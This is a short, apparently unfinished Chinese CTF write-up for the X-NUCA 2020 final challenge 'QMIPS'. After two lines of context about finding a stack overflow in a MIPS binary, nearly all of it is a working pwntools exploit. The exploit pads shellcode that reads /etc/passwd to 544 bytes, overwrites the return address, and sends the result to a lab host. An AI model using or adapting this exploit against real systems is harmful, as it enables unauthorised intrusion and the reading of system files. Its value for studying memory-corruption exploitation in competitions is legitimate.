X-NUCA 2020 Final 团队赛:QMIPS

更新中…又是瞎发包测出来的栈溢出,给出的MIPS程序IDA7.5居然没法分析:

附件:qmips.zip

from pwn import *
context(arch='mips',endian='big')

shellcode = asm(shellcraft.mips.linux.cat("/etc/passwd",7))
payload = shellcode.ljust(544,'a') + p32(0x418290)
io = remote("10.10.10.135",8000)
io.send(payload)
io.interactive()